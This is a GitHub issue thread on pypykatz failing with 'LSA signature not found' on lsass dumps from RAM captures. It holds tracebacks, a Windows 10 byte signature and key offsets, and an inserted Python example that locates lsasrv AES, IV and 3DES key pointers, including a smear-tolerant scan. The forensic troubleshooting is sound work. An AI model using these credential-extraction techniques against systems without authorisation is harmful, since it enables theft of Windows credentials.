skelsec/pypykatz

LSA signature not found

Wowhere opened this issue · 4 comments

Describe the bug
LSA signature not found. I use the volatility3-pypykatz plugin for Volatility, but as far as I can see the error comes from the pypykatz code. The same error occurs if I use pypykatz against the extracted lsass.dmp. The dump is correct; at least I can get hashdump and process handles from the dump using other Volatility plugins.

Volatility Version: develop, today (10.05.2024)
Operating System: Kali Linux
Python Version: 3.11.7

Steps to reproduce the behavior:

  1. Use command 'python3 vol.py -f ~/testy-tms/silver.raw -l t1 windows.volu_pypykatz.pypykatz'
  2. See error
    Traceback (most recent call last):
    File "/home/andy/2/volatility3/vol.py", line 7, in <module>
    import volatility3.cli
    File "/home/andy/2/volatility3/volatility3/cli/__init__.py", line 29, in <module>
    from volatility3.cli import text_renderer, volargparse
    File "/home/andy/2/volatility3/volatility3/cli/text_renderer.py", line 22, in <module>
    import capstone
    File "/home/andy/.local/lib/python3.11/site-packages/capstone/__init__.py", line 380, in <module>
    import pkg_resources
    File "/home/andy/.local/lib/python3.11/site-packages/pkg_resources/__init__.py", line 3324, in <module>
    @_call_aside
    ^^^^^^^^^^^
    File "/home/andy/.local/lib/python3.11/site-packages/pkg_resources/__init__.py", line 3299, in _call_aside
    f(*args, **kwargs)
    File "/home/andy/.local/lib/python3.11/site-packages/pkg_resources/__init__.py", line 3337, in _initialize_master_working_set
    working_set = WorkingSet._build_master()
    ^^^^^^^^^^^^^^^^^^^^^^^^^^
    File "/home/andy/.local/lib/python3.11/site-packages/pkg_resources/__init__.py", line 622, in _build_master
    ws = cls()
    ^^^^^
    File "/home/andy/.local/lib/python3.11/site-packages/pkg_resources/__init__.py", line 615, in __init__
    self.add_entry(entry)
    File "/home/andy/.local/lib/python3.11/site-packages/pkg_resources/__init__.py", line 671, in add_entry
    for dist in find_distributions(entry, True):
    File "/home/andy/.local/lib/python3.11/site-packages/pkg_resources/__init__.py", line 2133, in find_on_path
    yield from factory(fullpath)
    File "/home/andy/.local/lib/python3.11/site-packages/pkg_resources/__init__.py", line 2190, in distributions_from_metadata
    if len(os.listdir(path)) == 0:
    ^^^^^^^^^^^^^^^^
    KeyboardInterrupt

same issue for me as well, here are the error details:
INFO:pypykatz:pypyKatz version: 0.6.8
INFO:pypykatz:CPU arch: X64
INFO:pypykatz:OS: Windows 10
INFO:pypykatz:BuildNumber: 19041
INFO:pypykatz:MajorVersion: 6
INFO:pypykatz:MSV timestamp: 46191720

the error is "LSA Signature not found"

Using a PowerShell tool I managed to extract info about the crypto:
Pattern : 8364243000488D45E0448B4DD8488D15
AES-Offset : 16
IV-Offset : 67
key-struct : Get-BCRYPT_KEY81
DES-Offset : -89
key-handle : Get-BCRYPT_HANDLE_KEY

but for some reason the pattern does not exist in the lsasrv data. The minidump was created by MemProcFS.

Dear all,
The problem with parsing lsass extracted by memory capture tools is referred to as memory smearing, which is a known behavior of all forensics tools. There are no plans to add more heuristics to pypykatz to battle this issue, as this problem is not something worth addressing on a global level.
I can tell you how I solve this problem:

  • Take the memory snapshot multiple times; there is a good chance you'll get at least one dump which is parsable.
  • Modify the pypykatz code to suit your needs. By manually identifying key locations, you can edit the code to either look for the smeared values, or add a static offset where you expect the structures to be present.
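To make the two suggestions above (and the pattern/offset data posted earlier in the thread) concrete, here is an added worked example; it is not pypykatz's or mimikatz's own code. It takes the signature and the AES/IV/DES offsets quoted above, shows how the RIP-relative `lea` operands at those offsets are resolved to virtual addresses (the pattern ends on the `48 8D 15` opcode bytes of `lea rdx, [rip+disp32]`, so the displacement sits right after the match), and then demonstrates the two fallbacks: a mismatch-tolerant scan for a smeared copy of the pattern, and a caller-supplied static offset that skips the scan. The lsasrv image, the load address `BASE`, the `.data` RVAs in `TARGETS`, the `sigpos` value and the single corrupted byte are all constructed here for the demo; the AES/3DES operands really point at handle structures that need further dereferencing, which this example does not model.

```python
"""Signature-based location of lsasrv key material, with smear-tolerant fallbacks.

Added example for this thread; not pypykatz or mimikatz code.
"""
import struct
from typing import Optional

# Pattern and operand offsets as posted in the thread for this Win10 x64 build.
SIGNATURE = bytes.fromhex("8364243000488D45E0448B4DD8488D15")
AES_OFF, IV_OFF, DES_OFF = 16, 67, -89

BASE = 0x7FF8_1234_0000            # assumed lsasrv.dll load address (made up)
TARGETS = {AES_OFF: 0x9A000,       # made-up RVAs the three lea operands point at
           IV_OFF: 0x9A020,
           DES_OFF: 0x9A040}


def resolve_rip_relative(buf: bytes, base: int, disp_pos: int) -> int:
    """Target of a RIP-relative operand whose disp32 is stored at buf[disp_pos].
    x64 adds the displacement to the address of the *next* instruction, and the
    disp32 is the last field of the lea, so next = base + disp_pos + 4."""
    (disp,) = struct.unpack_from("<i", buf, disp_pos)
    return base + disp_pos + 4 + disp


def find_signature(buf: bytes, sig: bytes = SIGNATURE) -> int:
    """Exact scan: the normal path. A single torn byte makes this fail."""
    pos = buf.find(sig)
    if pos < 0:
        raise LookupError("LSA signature not found")
    return pos


def find_signature_fuzzy(buf: bytes, sig: bytes = SIGNATURE,
                         max_mismatch: int = 1) -> Optional[tuple]:
    """Scan tolerating up to max_mismatch differing bytes (a smeared copy).
    Pigeonhole trick: split sig into max_mismatch+1 chunks; any acceptable match
    must contain at least one intact chunk, so only candidates anchored on an
    exact chunk hit need the full byte-by-byte comparison. Returns
    (offset, mismatch_count) for the best candidate, or None."""
    k = max_mismatch + 1
    chunk_len = len(sig) // k
    best = None
    for ci in range(k):
        start = ci * chunk_len
        end = start + chunk_len if ci < k - 1 else len(sig)
        chunk = sig[start:end]
        hit = buf.find(chunk)
        while hit >= 0:
            pos = hit - start
            if 0 <= pos <= len(buf) - len(sig):
                mism = sum(a != b for a, b in zip(buf[pos:pos + len(sig)], sig))
                if mism <= max_mismatch and (best is None or mism < best[1]):
                    best = (pos, mism)
            hit = buf.find(chunk, hit + 1)
    return best


def locate_key_pointers(buf: bytes, base: int, sigpos: Optional[int] = None,
                        max_mismatch: int = 1) -> dict:
    """Resolve the three operands. sigpos, when given, is the 'static offset'
    option from the thread and bypasses scanning entirely."""
    mismatches = None
    if sigpos is None:
        try:
            sigpos, mismatches = find_signature(buf), 0
        except LookupError:
            cand = find_signature_fuzzy(buf, max_mismatch=max_mismatch)
            if cand is None:
                raise
            sigpos, mismatches = cand
    return {
        "sigpos": sigpos,
        "mismatches": mismatches,
        "aes_key_ptr": resolve_rip_relative(buf, base, sigpos + AES_OFF),
        "iv": resolve_rip_relative(buf, base, sigpos + IV_OFF),
        "des_key_ptr": resolve_rip_relative(buf, base, sigpos + DES_OFF),
    }


def build_sample_image(sigpos: int, rva_targets: dict,
                       smear_at: Optional[int] = None, size: int = 0x200) -> bytearray:
    """Constructed stand-in for an lsasrv.dll text region (not a real binary):
    0xCC filler, the signature at sigpos, and disp32 operands encoded so that
    they point at the given RVAs. smear_at flips one signature byte to mimic a
    page captured mid-write."""
    img = bytearray(b"\xcc" * size)
    img[sigpos:sigpos + len(SIGNATURE)] = SIGNATURE
    for off, rva in rva_targets.items():
        disp_pos = sigpos + off
        struct.pack_into("<i", img, disp_pos, rva - (disp_pos + 4))
    if smear_at is not None:
        img[sigpos + smear_at] ^= 0xFF
    return img


def demo() -> dict:
    clean = build_sample_image(0x120, TARGETS)
    torn = build_sample_image(0x120, TARGETS, smear_at=5)
    results = {"clean": locate_key_pointers(clean, BASE)}
    try:
        find_signature(torn)                       # what the exact scan does on a smeared page
    except LookupError as exc:
        results["torn_exact"] = str(exc)
    results["torn_fuzzy"] = locate_key_pointers(torn, BASE, max_mismatch=1)
    results["torn_static"] = locate_key_pointers(torn, BASE, sigpos=0x120)
    return results


if __name__ == "__main__":
    for name, value in demo().items():
        print(name, value)
```

On a real dump you would feed `locate_key_pointers` the bytes of the lsasrv.dll module as reconstructed from the minidump; the fuzzy scan only makes sense with a small mismatch budget (one or two bytes), since a larger budget starts matching unrelated code, and any candidate it returns should be sanity-checked by confirming the resolved operands land inside lsasrv's data section before the keys are read from them.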

The RAM dump was made by "Magnet RAM Forensics"; lsass.dmp was extracted from the RAM dump by MemProcFS. The minidump module for the extracted lsass.dmp doesn't show any errors: minidump_output.txt

The problem is that "shows no errors" doesn't mean that the actual data in the regions was captured correctly; it merely tells you that all regions were accounted for and the minidump file could be reconstructed. Sometimes even that is not correct, especially with "Magnet dump", which is the usual suspect for causing some issues.

Thank you for the info Skelsec! The memory dump I've collected has been created using DumpIt. Funny enough, it works really well with some Windows builds but fails with others. I will try to play with the structures and see if I can identify something. On the specific machine where it failed, creating multiple dumps did not help (so far), unfortunately, so I will try to work with pypykatz and modify it a bit.
Thank you for your amazing work with pypykatz!